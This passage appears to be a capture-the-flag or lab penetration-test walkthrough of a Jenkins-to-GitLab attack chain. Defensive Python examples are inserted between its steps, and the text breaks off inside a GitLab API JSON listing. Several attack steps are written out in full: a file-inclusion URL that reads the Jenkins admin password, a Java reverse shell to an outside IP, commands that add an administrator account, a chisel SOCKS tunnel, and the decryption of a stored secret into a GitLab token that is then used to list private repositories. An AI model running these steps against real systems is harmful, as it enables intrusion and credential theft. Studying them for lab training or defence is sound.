fscan-ip 39.101.180.135

Quite a few services are open.

Not sure whether this is a rabbit hole.

8080 has Jenkins.

There is a www.zip backup file.

File inclusion is possible.

Read C:\ProgramData\Jenkins\.jenkins\secrets\initialAdminPassword

Configuration file:

http://39.101.180.135/tools/content-log.php?logfile=C:\ProgramData\Jenkins\.jenkins\secrets\initialAdminPassword

This reads out the password 510235cf43f14e83b88a9f144199655b

admin:510235cf43f14e83b88a9f144199655b
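The `logfile=` parameter of the log viewer above accepts an arbitrary absolute path, which is what allowed the Jenkins initial admin password to be read. As an added example (not code from the original page; the base directory `/srv/app/logs` and the `.log` suffix rule are assumptions), this Python function shows the containment check a log viewer should apply before opening a requested file: it takes a bare file name, never a path, and compares the resolved location against the allowed directory.

```python
from pathlib import Path


def resolve_log_path(base_dir, requested):
    """Map a user-supplied log name onto a file inside base_dir.

    Returns the resolved path, or None when the request is not a bare
    file name directly inside base_dir with the expected suffix.
    """
    if not requested or "\x00" in requested:
        return None
    # A log viewer should take a file *name*, never a path: reject both
    # separator styles and the colon of a Windows drive letter up front.
    if any(ch in requested for ch in ("/", "\\", ":")):
        return None
    base = Path(base_dir).resolve()
    candidate = (base / requested).resolve()
    # resolve() follows symlinks and collapses "..", so the comparison is made
    # on the final location, not on the string the caller supplied.
    if candidate.parent != base:
        return None
    if candidate.suffix != ".log":
        return None
    return candidate


def is_allowed(base_dir, requested):
    """True when resolve_log_path would hand back a file inside base_dir."""
    return resolve_log_path(base_dir, requested) is not None


if __name__ == "__main__":
    base = "/srv/app/logs"  # assumed log directory (constructed)
    for name in ("access.log", "../../../etc/passwd",
                 r"C:\ProgramData\Jenkins\.jenkins\secrets\initialAdminPassword",
                 "..", "app.txt"):
        print(f"{name!r:72} -> {resolve_log_path(base, name)}")
```

The file is opened with the web server's own privileges, so the allowed directory should hold nothing but the logs the viewer is meant to show; the suffix check keeps a stray copy of a config or key file out of reach even inside that directory.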

String host="8.149.142.195";
int port=9999;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
  while(pi.available()>0)so.write(pi.read());
  while(pe.available()>0)so.write(pe.read());
  while(si.available()>0)po.write(si.read());so.flush();
  po.flush();
  Thread.sleep(50);
  try {p.exitValue();break;}catch (Exception e){}
};
p.destroy();
s.close();

Jenkins reverse shell, but it is quite unstable; let's try another approach.

Upload a file first, then bring up msf.

https://8.149.142.195:60000/api/v1/d/?en=YREusySZWyqgi5vtf1n1XQ%3D%3D

Very strange: the uploaded file won't execute, it just hangs, and the reverse shell can't run commands either. Speechless.

println "net user dionysus QWE123qwe. /add".execute().text
println "net localgroup administrators dionysus /add".execute().text

Internal address: 172.22.14.7

Start scanning with fscan:

172.22.14.11:445 open
172.22.14.7:8080 open
172.22.14.7:3306 open
172.22.14.31:1521 open
172.22.14.46:445 open
172.22.14.31:445 open
172.22.14.7:135 open
172.22.14.46:80 open
172.22.14.16:80 open
172.22.14.7:80 open
172.22.14.16:22 open
172.22.14.11:88 open
172.22.14.16:8060 open
172.22.14.46:135 open
172.22.14.7:445 open
172.22.14.46:139 open
172.22.14.31:135 open
172.22.14.31:139 open
172.22.14.11:135 open
172.22.14.11:139 open
172.22.14.7:139 open
172.22.14.16:9094 open
[*] NetInfo 
[*]172.22.14.7
   [->]XR-JENKINS
   [->]172.22.14.7
[*] NetInfo 
[*]172.22.14.31
   [->]XR-ORACLE
   [->]172.22.14.31
[*] NetBios 172.22.14.46    XIAORANG\XR-0923              
[*] WebTitle http://172.22.14.16:8060  code:404 len:555    title:404 Not Found
[*] NetInfo 
[*]172.22.14.46
   [->]XR-0923
   [->]172.22.14.46
[*] WebTitle http://172.22.14.7:8080   code:403 len:548    title:None
[*] NetInfo 
[*]172.22.14.11
   [->]XR-DC
   [->]172.22.14.11
[*] NetBios 172.22.14.11    [+] DC:XIAORANG\XR-DC          
[*] NetBios 172.22.14.31    WORKGROUP\XR-ORACLE           
[*] WebTitle http://172.22.14.46       code:200 len:703    title:IIS Windows Server
[*] WebTitle http://172.22.14.7        code:200 len:54603  title:XR SHOP
[*] WebTitle http://172.22.14.16       code:302 len:99     title:None 跳转url: http://172.22.14.16/users/sign_in
[*] WebTitle http://172.22.14.16/users/sign_in code:200 len:34961  title:Sign in · GitLab

(icmp) Target 172.22.14.7     is alive (this host)
(icmp) Target 172.22.14.11    is alive [+] DC:XIAORANG\XR-DC
(icmp) Target 172.22.14.16    is alive web
(icmp) Target 172.22.14.31    is alive WORKGROUP\XR-ORACLE
(icmp) Target 172.22.14.46    is alive XIAORANG\XR-0923
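The raw fscan output above mixes port lines, NetInfo blocks, NetBIOS answers and web titles for the same handful of hosts. As an added example (not part of the original writeup; the sample lines are a constructed subset in the same shape), this Python script folds that output into a per-host inventory, which is the form a blue team wants when deciding what the exposed services were and which host is the domain controller.

```python
import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Constructed sample in the shape of the fscan output above (a subset of the lines).
SAMPLE = r"""
172.22.14.11:445 open
172.22.14.7:8080 open
172.22.14.11:88 open
172.22.14.16:22 open
[*] NetInfo 
[*]172.22.14.7
   [->]XR-JENKINS
   [->]172.22.14.7
[*] NetBios 172.22.14.46    XIAORANG\XR-0923              
[*] WebTitle http://172.22.14.16:8060  code:404 len:555    title:404 Not Found
[*] NetInfo 
[*]172.22.14.11
   [->]XR-DC
   [->]172.22.14.11
[*] NetBios 172.22.14.11    [+] DC:XIAORANG\XR-DC          
[*] NetBios 172.22.14.31    WORKGROUP\XR-ORACLE           
"""

IP_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
PORT_RE = re.compile(r"^(\S+?):(\d+) open\s*$")
NETINFO_RE = re.compile(r"^\[\*\](\S+)\s*$")          # "[*]<ip>" opens a NetInfo block
ARROW_RE = re.compile(r"^\s*\[->\](\S+)\s*$")         # "[->]name" or "[->]ip" inside it
NETBIOS_RE = re.compile(r"^\[\*\] NetBios (\S+)\s+(.*?)\s*$")
WEBTITLE_RE = re.compile(r"^\[\*\] WebTitle (\S+)\s+code:(\d+)\s+len:\d+\s+title:(.*?)\s*$")


@dataclass
class Host:
    ip: str
    ports: set = field(default_factory=set)
    hostname: str = ""
    domain: str = ""
    is_dc: bool = False
    web: dict = field(default_factory=dict)  # url -> (status code, title)


def parse_fscan(text):
    """Return {ip: Host} built from fscan's mixed-format output."""
    hosts = {}
    current = None  # host whose NetInfo block we are inside, if any

    def get(ip):
        return hosts.setdefault(ip, Host(ip))

    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            get(m.group(1)).ports.add(int(m.group(2)))
            current = None
            continue
        m = NETINFO_RE.match(line)
        if m and IP_RE.match(m.group(1)):
            current = get(m.group(1))
            continue
        m = ARROW_RE.match(line)
        if m and current is not None:
            # The first non-IP arrow line in a NetInfo block is the host name.
            if not IP_RE.match(m.group(1)) and not current.hostname:
                current.hostname = m.group(1)
            continue
        m = NETBIOS_RE.match(line)
        if m:
            host, rest = get(m.group(1)), m.group(2)
            if rest.startswith("[+] DC:"):
                host.is_dc = True
                rest = rest[len("[+] DC:"):]
            if "\\" in rest:
                host.domain, host.hostname = rest.split("\\", 1)
            current = None
            continue
        m = WEBTITLE_RE.match(line)
        if m:
            url, status, title = m.groups()
            get(urlsplit(url).hostname).web[url] = (int(status), title)
            current = None
    return hosts


def domain_controllers(hosts):
    return sorted(ip for ip, h in hosts.items() if h.is_dc)


def workgroup_hosts(hosts):
    """Hosts that answered NetBIOS with a workgroup rather than the domain:
    candidates for systems sitting outside domain policy (the Oracle box here)."""
    return sorted(ip for ip, h in hosts.items() if h.domain.upper() == "WORKGROUP")


if __name__ == "__main__":
    inventory = parse_fscan(SAMPLE)
    for ip, h in sorted(inventory.items()):
        tag = " (DC)" if h.is_dc else ""
        print(f"{ip:15} {h.domain}\\{h.hostname}{tag} ports={sorted(h.ports)} web={list(h.web)}")
```

Feeding the script the full scan instead of the sample gives one line per host; the Windows hosts answering on 445/139 with a domain name and the GitLab host answering only on 22/80/8060/9094 stand out immediately, which is the picture an asset owner should already have before a scan like this is run against them.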

Set up a proxy:

.\chisel.exe client 8.149.142.195:7000 R:0.0.0.0:7777:socks

Go after 172.22.14.16.

C:/ProgramData/Jenkins/.jenkins/credentials.xml

The administrator has configured GitLab for Jenkins. Try to obtain the GitLab API token and ultimately get at the sensitive repositories in GitLab. After obtaining the sensitive information, try to connect to the Oracle database and take control of the ORACLE server.

<?xml version='1.1' encoding='UTF-8'?>
<com.cloudbees.plugins.credentials.SystemCredentialsProvider plugin="[email protected]">
  <domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash">
    <entry>
      <com.cloudbees.plugins.credentials.domains.Domain>
        <specifications/>
      </com.cloudbees.plugins.credentials.domains.Domain>
      <java.util.concurrent.CopyOnWriteArrayList>
        <com.dabsquared.gitlabjenkins.connection.GitLabApiTokenImpl plugin="[email protected]">
          <scope>GLOBAL</scope>
          <id>9eca4a05-e058-4810-b952-bd6443e6d9a8</id>
          <description></description>
          <apiToken>{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}</apiToken>
        </com.dabsquared.gitlabjenkins.connection.GitLabApiTokenImpl>
      </java.util.concurrent.CopyOnWriteArrayList>
    </entry>
  </domainCredentialsMap>
</com.cloudbees.plugins.credentials.SystemCredentialsProvider>

{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh} is the token.
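The `{...}` value in `<apiToken>` is a hudson.util.Secret ciphertext: it is encrypted with the controller's own master key, so anyone who can read the file alongside `secrets/`, or run the Script Console, can recover it, as the next step shows. As an added example (not from the original page; the XML below is a constructed copy of the file's layout with a made-up token value and without the plugin version attributes), this Python script inventories a `credentials.xml` without decrypting anything, so a defender can see which credentials exist, how widely they are scoped and which ones to rotate once the file is known to have been read.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample mirroring the layout of the credentials.xml above; the
# token value is made up and the plugin version attributes are omitted.
SAMPLE_XML = """<?xml version='1.0' encoding='UTF-8'?>
<com.cloudbees.plugins.credentials.SystemCredentialsProvider plugin="credentials">
  <domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash">
    <entry>
      <com.cloudbees.plugins.credentials.domains.Domain>
        <specifications/>
      </com.cloudbees.plugins.credentials.domains.Domain>
      <java.util.concurrent.CopyOnWriteArrayList>
        <com.dabsquared.gitlabjenkins.connection.GitLabApiTokenImpl plugin="gitlab-plugin">
          <scope>GLOBAL</scope>
          <id>9eca4a05-e058-4810-b952-bd6443e6d9a8</id>
          <description></description>
          <apiToken>{AQAAABAAAAAgCONSTRUCTEDsampleVALUEonly0123456789+/==}</apiToken>
        </com.dabsquared.gitlabjenkins.connection.GitLabApiTokenImpl>
      </java.util.concurrent.CopyOnWriteArrayList>
    </entry>
  </domainCredentialsMap>
</com.cloudbees.plugins.credentials.SystemCredentialsProvider>
"""

# Shape of a hudson.util.Secret ciphertext as written to XML: base64 in braces.
JENKINS_SECRET_RE = re.compile(r"^\{[A-Za-z0-9+/=]+\}$")


def audit_credentials(xml_text):
    """Return one record per credential entry in a Jenkins credentials.xml.

    Nothing is decrypted: the output lists the credential class, id, scope,
    which fields hold encrypted secrets, and the issues a reviewer would raise.
    """
    data = xml_text.encode("utf-8") if isinstance(xml_text, str) else xml_text
    root = ET.fromstring(data)
    findings = []
    for elem in root.iter():
        cred_id = elem.findtext("id")
        if cred_id is None:
            continue  # only credential objects carry a direct <id> child
        secret_fields = [c.tag for c in elem
                         if c.text and JENKINS_SECRET_RE.match(c.text.strip())]
        scope = (elem.findtext("scope") or "").strip()
        description = (elem.findtext("description") or "").strip()
        issues = []
        if scope == "GLOBAL":
            issues.append("GLOBAL scope: usable from every job and pipeline on the controller")
        if not description:
            issues.append("empty description: owner and purpose are not recorded")
        if secret_fields:
            issues.append("encrypted secret in " + ", ".join(secret_fields)
                          + ": recoverable by anyone with Script Console or secrets/ access; "
                            "rotate at the issuing service if this file was exposed")
        findings.append({
            "class": elem.tag,
            "id": cred_id.strip(),
            "scope": scope,
            "secret_fields": secret_fields,
            "issues": issues,
        })
    return findings


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_XML
    for f in audit_credentials(text):
        print(f"{f['id']}  {f['class'].rsplit('.', 1)[-1]}  scope={f['scope'] or '-'}")
        for issue in f["issues"]:
            print("   -", issue)
```

Run against a real controller's file, the script is a rotation checklist: every entry with a secret field is a credential whose value must be considered known to whoever read the file, and a GitLab token in particular should be revoked at GitLab rather than merely re-encrypted in Jenkins.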

println(hudson.util.Secret.fromString("{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}").getPlainText())

Back in Jenkins, this decrypts to glpat-7kD_qLH2PiQv_ywB9hz2

p4 curl --header "PRIVATE-TOKEN:glpat-7kD_qLH2PiQv_ywB9hz2" "http://172.22.14.16/api/v4/projects"

That returns a whole pile:

[
    {
        "id": 6,
        "description": null,
        "name": "Internal Secret",
        "name_with_namespace": "XRLAB / Internal Secret",
        "path": "internal-secret",
        "path_with_namespace": "xrlab/internal-secret",
        "created_at": "2022-12-25T08:30:12.362Z",
        "default_branch": "main",
        "tag_list": [

        ],
        "topics": [

        ],
        "ssh_url_to_repo": "[email protected]:xrlab/internal-secret.git",
        "http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/internal-secret.git",
        "web_url": "http://gitlab.xiaorang.lab/xrlab/internal-secret",
        "readme_url": null,
        "avatar_url": null,
        "forks_count": 0,
        "star_count": 0,
        "last_activity_at": "2022-12-25T08:30:12.362Z",
        "namespace": {
            "id": 8,
            "name": "XRLAB",
            "path": "xrlab",
            "kind": "group",
            "full_path": "xrlab",
            "parent_id": null,
            "avatar_url": null,
            "web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
        },
        "_links": {
            "self": "http://gitlab.xiaorang.lab/api/v4/projects/6",
            "issues": "http://gitlab.xiaorang.lab/api/v4/projects/6/issues",
            "merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/6/merge_requests",
            "repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/6/repository/branches",
            "labels": "http://gitlab.xiaorang.lab/api/v4/projects/6/labels",
            "events": "http://gitlab.xiaorang.lab/api/v4/projects/6/events",
            "members": "http://gitlab.xiaorang.lab/api/v4/projects/6/members",
            "cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/6/cluster_agents"
        },
        "packages_enabled": true,
        "empty_repo": false,
        "archived": false,
        "visibility": "private",
        "resolve_outdated_diff_discussions": false,
        "container_expiration_policy": {
            "cadence": "1d",
            "enabled": false,
            "keep_n": 10,
            "older_than": "90d",
            "name_regex": ".*",
            "name_regex_keep": null,
            "next_run_at": "2022-12-26T08:30:12.373Z"
        },
        "issues_enabled": true,
        "merge_requests_enabled": true,
        "wiki_enabled": true,
        "jobs_enabled": true,
        "snippets_enabled": true,
        "container_registry_enabled": true,
        "service_desk_enabled": false,
        "service_desk_address": null,
        "can_create_merge_request_in": true,
        "issues_access_level": "enabled",
        "repository_access_level": "enabled",
        "merge_requests_access_level": "enabled",
        "forking_access_level": "enabled",
        "wiki_access_level": "enabled",
        "builds_access_level": "enabled",
        "snippets_access_level": "enabled",
        "pages_access_level": "private",
        "operations_access_level": "enabled",
        "analytics_access_level": "enabled",
        "container_registry_access_level": "enabled",
        "security_and_compliance_access_level": "private",
        "releases_access_level": "enabled",
        "environments_access_level": "enabled",
        "feature_flags_access_level": "enabled",
        "infrastructure_access_level": "enabled",
        "monitor_access_level": "enabled",
        "emails_disabled": null,
        "shared_runners_enabled": true,
        "lfs_enabled": true,
        "creator_id": 2,
        "import_url": null,
        "import_type": null,
        "import_status": "none",
        "open_issues_count": 0,
        "ci_default_git_depth": 20,
        "ci_forward_deployment_enabled": true,
        "ci_job_token_scope_enabled": false,
        "ci_separated_caches": true,
        "ci_opt_in_jwt": false,
        "ci_allow_fork_pipelines_to_run_in_parent_project": true,
        "public_jobs": true,
        "build_timeout": 3600,
        "auto_cancel_pending_pipelines": "enabled",
        "ci_config_path": null,
        "shared_with_groups": [

        ],
        "only_allow_merge_if_pipeline_succeeds": false,
        "allow_merge_on_skipped_pipeline": null,
        "restrict_user_defined_variables": false,
        "request_access_enabled": true,
        "only_allow_merge_if_all_discussions_are_resolved": false,
        "remove_source_branch_after_merge": true,
        "printing_merge_request_link_enabled": true,
        "merge_method": "merge",
        "squash_option": "default_off",
        "enforce_auth_checks_on_uploads": true,
        "suggestion_commit_message": null,
        "merge_commit_template": null,
        "squash_commit_template": null,
        "issue_branch_template": null,
        "auto_devops_enabled": true,
        "auto_devops_deploy_strategy": "continuous",
        "autoclose_referenced_issues": true,
        "keep_latest_artifact": true,
        "runner_token_expiration_interval": null,
        "permissions": {
            "project_access": null,
            "group_access": {
                "access_level": 50,
                "notification_level": 3
            }
        }
    },
    {
        "id": 4,
        "description": null,
        "name": "XRAdmin",
        "name_with_namespace": "XRLAB / XRAdmin",
        "path": "xradmin",
        "path_with_namespace": "xrlab/xradmin",
        "created_at": "2022-12-25T07:48:16.751Z",
        "default_branch": "main",
        "tag_list": [

        ],
        "topics": [

        ],
        "ssh_url_to_repo": "[email protected]:xrlab/xradmin.git",
        "http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/xradmin.git",
        "web_url": "http://gitlab.xiaorang.lab/xrlab/xradmin",
        "readme_url": "http://gitlab.xiaorang.lab/xrlab/xradmin/-/blob/main/README.md",
        "avatar_url": null,
        "forks_count": 0,
        "star_count": 0,
        "last_activity_at": "2023-05-30T10:27:31.762Z",
        "namespace": {
            "id": 8,
            "name": "XRLAB",
            "path": "xrlab",
            "kind": "group",
            "full_path": "xrlab",
            "parent_id": null,
            "avatar_url": null,
            "web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
        },
        "_links": {
            "self": "http://gitlab.xiaorang.lab/api/v4/projects/4",
            "issues": "http://gitlab.xiaorang.lab/api/v4/projects/4/issues",
            "merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/4/merge_requests",
            "repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/4/repository/branches",
            "labels": "http://gitlab.xiaorang.lab/api/v4/projects/4/labels",
            "events": "http://gitlab.xiaorang.lab/api/v4/projects/4/events",
            "members": "http://gitlab.xiaorang.lab/api/v4/projects/4/members",
            "cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/4/cluster_agents"
        },
        "packages_enabled": true,
        "empty_repo": false,
        "archived": false,
        "visibility": "private",
        "resolve_outdated_diff_discussions": false,
        "container_expiration_policy": {
            "cadence": "1d",
            "enabled": false,
            "keep_n": 10,
            "older_than": "90d",
            "name_regex": ".*",
            "name_regex_keep": null,
            "next_run_at": "2022-12-26T07:48:16.788Z"
        },
        "issues_enabled": true,
        "merge_requests_enabled": true,
        "wiki_enabled": true,
        "jobs_enabled": true,
        "snippets_enabled": true,
        "container_registry_enabled": true,
        "service_desk_enabled": false,
        "service_desk_address": null,
        "can_create_merge_request_in": true,
        "issues_access_level": "enabled",
        "repository_access_level": "enabled",
        "merge_requests_access_level": "enabled",
        "forking_access_level": "enabled",
        "wiki_access_level": "enabled",
        "builds_access_level": "enabled",
        "snippets_access_level": "enabled",
        "pages_access_level": "private",
        "operations_access_level": "enabled",
        "analytics_access_level": "enabled",
        "container_registry_access_level": "enabled",
        "security_and_compliance_access_level": "private",
        "releases_access_level": "enabled",
        "environments_access_level": "enabled",
        "feature_flags_access_level": "enabled",
        "infrastructure_access_level": "enabled",
        "monitor_access_level": "enabled",
        "emails_disabled": null,
        "shared_runners_enabled": true,
        "lfs_enabled": true,
        "creator_id": 2,
        "import_url": null,
        "import_type": null,
        "import_status": "none",
        "open_issues_count": 0,
        "ci_default_git_depth": 20,
        "ci_forward_deployment_enabled": true,
        "ci_job_token_scope_enabled": false,
        "ci_separated_caches": true,
        "ci_opt_in_jwt": false,
        "ci_allow_fork_pipelines_to_run_in_parent_project": true,
        "public_jobs": true,
        "build_timeout": 3600,
        "auto_cancel_pending_pipelines": "enabled",
        "ci_config_path": null,
        "shared_with_groups": [

        ],
        "only_allow_merge_if_pipeline_succeeds": false,
        "allow_merge_on_skipped_pipeline": null,
        "restrict_user_defined_variables": false,
        "request_access_enabled": true,
        "only_allow_merge_if_all_discussions_are_resolved": false,
        "remove_source_branch_after_merge": true,
        "printing_merge_request_link_enabled": true,
        "merge_method": "merge",
        "squash_option": "default_off",
        "enforce_auth_checks_on_uploads": true,
        "suggestion_commit_message": null,
        "merge_commit_template": null,
        "squash_commit_template": null,
        "issue_branch_template": null,
        "auto_devops_enabled": false,
        "auto_devops_deploy_strategy": "continuous",
        "autoclose_referenced_issues": true,
        "keep_latest_artifact": true,
        "runner_token_expiration_interval": null,
        "permissions": {
            "project_access": null,
            "group_access": {
                "access_level": 50,
                "notification_level": 3
            }
        }
    },
    {
        "id": 3,
        "description": null,
        "name": "Awenode",
        "name_with_namespace": "XRLAB / Awenode",
        "path": "awenode",
        "path_with_namespace": "xrlab/awenode",
        "created_at": "2022-12-25T07:46:43.635Z",
        "default_branch": "master",
        "tag_list": [

        ],
        "topics": [

        ],
        "ssh_url_to_repo": "[email protected]:xrlab/awenode.git",
        "http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/awenode.git",
        "web_url": "http://gitlab.xiaorang.lab/xrlab/awenode",
        "readme_url": "http://gitlab.xiaorang.lab/xrlab/awenode/-/blob/master/README.md",
        "avatar_url": null,
        "forks_count": 0,
        "star_count": 0,
        "last_activity_at": "2022-12-25T07:46:43.635Z",
        "namespace": {
            "id": 8,
            "name": "XRLAB",
            "path": "xrlab",
            "kind": "group",
            "full_path": "xrlab",
            "parent_id": null,
            "avatar_url": null,
            "web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
        },
        "_links": {
            "self": "http://gitlab.xiaorang.lab/api/v4/projects/3",
            "issues": "http://gitlab.xiaorang.lab/api/v4/projects/3/issues",
            "merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/3/merge_requests",
            "repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/3/repository/branches",
            "labels": "http://gitlab.xiaorang.lab/api/v4/projects/3/labels",
            "events": "http://gitlab.xiaorang.lab/api/v4/projects/3/events",
            "members": "http://gitlab.xiaorang.lab/api/v4/projects/3/members",
            "cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/3/cluster_agents"
        },
        "packages_enabled": true,
        "empty_repo": false,
        "archived": false,
        "visibility": "private",
        "resolve_outdated_diff_discussions": false,
        "container_expiration_policy": {
            "cadence": "1d",
            "enabled": false,
            "keep_n": 10,
            "older_than": "90d",
            "name_regex": ".*",
            "name_regex_keep": null,
            "next_run_at": "2022-12-26T07:46:44.614Z"
        },
        "issues_enabled": true,
        "merge_requests_enabled": true,
        "wiki_enabled": true,
        "jobs_enabled": true,
        "snippets_enabled": true,
        "container_registry_enabled": true,
        "service_desk_enabled": false,
        "service_desk_address": null,
        "can_create_merge_request_in": true,
        "issues_access_level": "enabled",
        "repository_access_level": "enabled",
        "merge_requests_access_level": "enabled",
        "forking_access_level": "enabled",
        "wiki_access_level": "enabled",
        "builds_access_level": "enabled",
        "snippets_access_level": "enabled",
        "pages_access_level": "private",
        "operations_access_level": "enabled",
        "analytics_access_level": "enabled",
        "container_registry_access_level": "enabled",
        "security_and_compliance_access_level": "private",
        "releases_access_level": "enabled",
        "environments_access_level": "enabled",
        "feature_flags_access_level": "enabled",
        "infrastructure_access_level": "enabled",
        "monitor_access_level": "enabled",
        "emails_disabled": null,
        "shared_runners_enabled": true,
        "lfs_enabled": true,
        "creator_id": 2,
        "import_url": null,
        "import_type": "gitlab_project",
        "import_status": "finished",
        "open_issues_count": 0,
        "ci_default_git_depth": 20,
        "ci_forward_deployment_enabled": true,
        "ci_job_token_scope_enabled": false,
        "ci_separated_caches": true,
        "ci_opt_in_jwt": false,
        "ci_allow_fork_pipelines_to_run_in_parent_project": true,
        "public_jobs": true,
        "build_timeout": 3600,
        "auto_cancel_pending_pipelines": "enabled",
        "ci_config_path": null,
        "shared_with_groups": [

        ],
        "only_allow_merge_if_pipeline_succeeds": false,
        "allow_merge_on_skipped_pipeline": null,
        "restrict_user_defined_variables": false,
        "request_access_enabled": true,
        "only_allow_merge_if_all_discussions_are_resolved": false,
        "remove_source_branch_after_merge": true,
        "printing_merge_request_link_enabled": true,
        "merge_method": "merge",
        "squash_option": "default_off",
        "enforce_auth_checks_on_uploads": true,
        "suggestion_commit_message": null,
        "merge_commit_template": null,
        "squash_commit_template": null,
        "issue_branch_template": null,
        "auto_devops_enabled": true,
        "auto_devops_deploy_strategy": "continuous",
        "autoclose_referenced_issues": true,
        "keep_latest_artifact": true,
        "runner_token_expiration_interval": null,
        "permissions": {
            "project_access": {
                "access_level": 40,
                "notification_level": null
            },
            "group_access": {
                "access_level": 50,
                "notification_level": 3
            }
        }
    },
    {
        "id": 2,
        "description": "Example GitBook site using GitLab Pages: https://pages.gitlab.io/gitbook",
        "name": "XRWiki",
        "name_with_namespace": "XRLAB / XRWiki",
        "path": "xrwiki",
        "path_with_namespace": "xrlab/xrwiki",
        "created_at": "2022-12-25T07:44:18.589Z",
        "default_branch": "master",
        "tag_list": [

        ],
        "topics": [

        ],
        "ssh_url_to_repo": "[email protected]:xrlab/xrwiki.git",
        "http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/xrwiki.git",
        "web_url": "http://gitlab.xiaorang.lab/xrlab/xrwiki",
        "readme_url": "http://gitlab.xiaorang.lab/xrlab/xrwiki/-/blob/master/README.md",
        "avatar_url": "http://gitlab.xiaorang.lab/uploads/-/system/project/avatar/2/gitbook.png",
        "forks_count": 0,
        "star_count": 0,
        "last_activity_at": "2022-12-25T07:44:18.589Z",
        "namespace": {
            "id": 8,
            "name": "XRLAB",
            "path": "xrlab",
            "kind": "group",
            "full_path": "xrlab",
            "parent_id": null,
            "avatar_url": null,
            "web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
        },
        "_links": {
            "self": "http://gitlab.xiaorang.lab/api/v4/projects/2",
            "issues": "http://gitlab.xiaorang.lab/api/v4/projects/2/issues",
            "merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/2/merge_requests",
            "repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/2/repository/branches",
            "labels": "http://gitlab.xiaorang.lab/api/v4/projects/2/labels",
            "events": "http://gitlab.xiaorang.lab/api/v4/projects/2/events",
            "members": "http://gitlab.xiaorang.lab/api/v4/projects/2/members",
            "cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/2/cluster_agents"
        },
        "packages_enabled": true,
        "empty_repo": false,
        "archived": false,
        "visibility": "private",
        "resolve_outdated_diff_discussions": null,
        "container_expiration_policy": {
            "cadence": "1d",
            "enabled": false,
            "keep_n": 10,
            "older_than": "90d",
            "name_regex": ".*",
            "name_regex_keep": null,
            "next_run_at": "2022-12-26T07:44:18.627Z"
        },
        "issues_enabled": true,
        "merge_requests_enabled": true,
        "wiki_enabled": false,
        "jobs_enabled": true,
        "snippets_enabled": false,
        "container_registry_enabled": false,
        "service_desk_enabled": false,
        "service_desk_address": null,
        "can_create_merge_request_in": true,
        "issues_access_level": "enabled",
        "repository_access_level": "enabled",
        "merge_requests_access_level": "enabled",
        "forking_access_level": "enabled",
        "wiki_access_level": "disabled",
        "builds_access_level": "enabled",
        "snippets_access_level": "disabled",
        "pages_access_level": "public",
        "operations_access_level": "enabled",
        "analytics_access_level": "enabled",
        "container_registry_access_level": "disabled",
        "security_and_compliance_access_level": "private",
        "releases_access_level": "enabled",
        "environments_access_level": "enabled",
        "feature_flags_access_level": "enabled",
        "infrastructure_access_level": "enabled",
        "monitor_access_level": "enabled",
        "emails_disabled": null,
        "shared_runners_enabled": true,
        "lfs_enabled": true,
        "creator_id": 2,
        "import_url": null,
        "import_type": "gitlab_project",
        "import_status": "finished",
        "open_issues_count": 0,
        "ci_default_git_depth": 20,
        "ci_forward_deployment_enabled": true,
        "ci_job_token_scope_enabled": false,
        "ci_separated_caches": true,
        "ci_opt_in_jwt": false,
        "ci_allow_fork_pipelines_to_run_in_parent_project": true,
        "public_jobs": true,
        "build_timeout": 3600,
        "auto_cancel_pending_pipelines": "enabled",
        "ci_config_path": null,
        "shared_with_groups": [

        ],
        "only_allow_merge_if_pipeline_succeeds": false,
        "allow_merge_on_skipped_pipeline": null,
        "restrict_user_defined_variables": false,
        "request_access_enabled": false,
        "only_allow_merge_if_all_discussions_are_resolved": false,
        "remove_source_branch_after_merge": true,
        "printing_merge_request_link_enabled": true,
        "merge_method": "merge",
        "squash_option": "default_off",
        "enforce_auth_checks_on_uploads": true,
        "suggestion_commit_message": null,
        "merge_commit_template": null,
        "squash_commit_template": null,
        "issue_branch_template": null,
        "auto_devops_enabled": true,
        "auto_devops_deploy_strategy": "continuous",
        "autoclose_referenced_issues": true,
        "keep_latest_artifact": true,
        "runner_token_expiration_interval": null,
        "permissions": {
            "project_access": {
                "access_level": 40,
                "notification_level": null
            },
            "group_access": {
                "access_level": 50,
                "notification_level": 3
            }
        }
    },
    {
        "id": 1,
        "description": "This project is automatically generated and helps monitor this GitLab instance. [Learn more](/help/administration/monitoring/gitlab_self_monitoring_project/index).",
        "name": "Monitoring",
        "name_with_namespace": "GitLab Instance / Monitoring",
        "path": "Monitoring",
